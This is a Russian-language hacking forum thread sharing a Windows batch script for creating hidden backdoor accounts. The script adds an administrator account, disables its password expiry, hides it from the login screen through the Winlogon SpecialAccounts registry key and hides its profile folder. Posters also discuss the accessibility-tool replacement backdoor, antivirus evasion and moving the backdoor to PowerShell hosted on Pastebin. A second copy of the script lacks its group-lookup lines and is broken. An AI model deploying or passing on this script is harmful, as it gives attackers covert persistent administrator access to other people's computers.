Батник для создания скрытых учёток, бэкдоров и т.д. | DedicateT.com

Симпатии
0
Баллы
1
какой бэкдор создает?

Симпатии
15
Баллы
3
Обратите внимание, если вы хотите заключить сделку с этим пользователем, что он заблокирован.
Древний как мамонт, заменяет экранную клавиатуру на командную строку...все хочу написать авторскую статью про это..все же не многие знают все нюансы и возможности данной замены

Симпатии
41
Баллы
23
создает только на учетках с англ языком, потому что добавляет в группу administrators, если администраторы или administrateus, то конечно будет ошибка при создании. Добавь в батник после
"net localgroup administrators /add %user%"
net localgroup users %user% /delete Чтобы учетка была чисто админская, а не с урезанными правами от юзера.

Симпатии
41
Баллы
23
Древний как мамонт, заменяет экранную клавиатуру на командную строку...все хочу написать авторскую статью про это..все же не многие знают все нюансы и возможности данной замены
И каждый вшивый антивирь удаляет этот бэкдор.

Симпатии
15
Баллы
3
Обратите внимание, если вы хотите заключить сделку с этим пользователем, что он заблокирован.
И каждый вшивый антивирь удаляет этот бэкдор.
ну а что мешает переделать в повершелл и засунуть допустим в пастербин? я не имею ввиду данную прогу а в целом сам бэкдур

Симпатии
41
Баллы
23
ну а что мешает переделать в повершелл и засунуть допустим в пастербин? я не имею ввиду данную прогу а в целом сам бэкдур
Я не понял про какую прогу ты имеешь ввиду, вроде о проге речь не идет. Тут дело в записи реестра и почти каждый антивирь удаляет эту запись, если там есть ссылка с лупы или клавы на любой экзешник.

Симпатии
41
Баллы
23
Код:
@echo off
echo ---------
color 0f
set /p user=username:
set /p pass=password:
set AdmGroupSID=S-1-5-32-544
set AdmGroup=
For /F "UseBackQ Tokens=1* Delims==" %%I In (`WMIC Group Where "SID = '%AdmGroupSID%'" Get Name /Value ^| Find "="`) Do set AdmGroup=%%J
set AdmGroup=%AdmGroup:~0,-1%
net user %user% %pass% /add /Passwordchg:Yes
net localgroup %AdmGroup% %user% /add
WMIC useraccount where name='%user%' set passwordexpires=false
set AdmGroupSID=S-1-5-32-545
set AdmGroup=
For /F "UseBackQ Tokens=1* Delims==" %%I In (`WMIC Group Where "SID = '%AdmGroupSID%'" Get Name /Value ^| Find "="`) Do set AdmGroup=%%J
net localgroup %AdmGroup% %user% /delete
net accounts /forcelogoff:no /maxpwage:unlimited
reg add "HKLM\software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v %user% /t REG_DWORD /d 0x0 /f
if not exist %systemdrive%\users\%user% mkdir %systemdrive%\users\%user%
attrib %systemdrive%\users\%user% +a +s +h
@pause

Симпатии
40
Баллы
33
я с другого сайта скачивал
то что ты скачал работает только на семерках и может быть на серверах 2008. бесполезная штука.
Код:
@echo off
echo ---------
color 0f
set /p user=username:
set /p pass=password:
set AdmGroupSID=S-1-5-32-544
set AdmGroup=
set AdmGroup=%AdmGroup:~0,-1%
net user %user% %pass% /add /Passwordchg:Yes
net localgroup %AdmGroup% %user% /add
WMIC useraccount where name='%user%' set passwordexpires=false
set AdmGroupSID=S-1-5-32-545
set AdmGroup=
net localgroup %AdmGroup% %user% /delete
net accounts /forcelogoff:no /maxpwage:unlimited
reg add "HKLM\software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v %user% /t REG_DWORD /d 0x0 /f
if not exist %systemdrive%\users\%user% mkdir %systemdrive%\users\%user%
attrib %systemdrive%\users\%user% +a +s +h
@pause
у меня лучше есть.)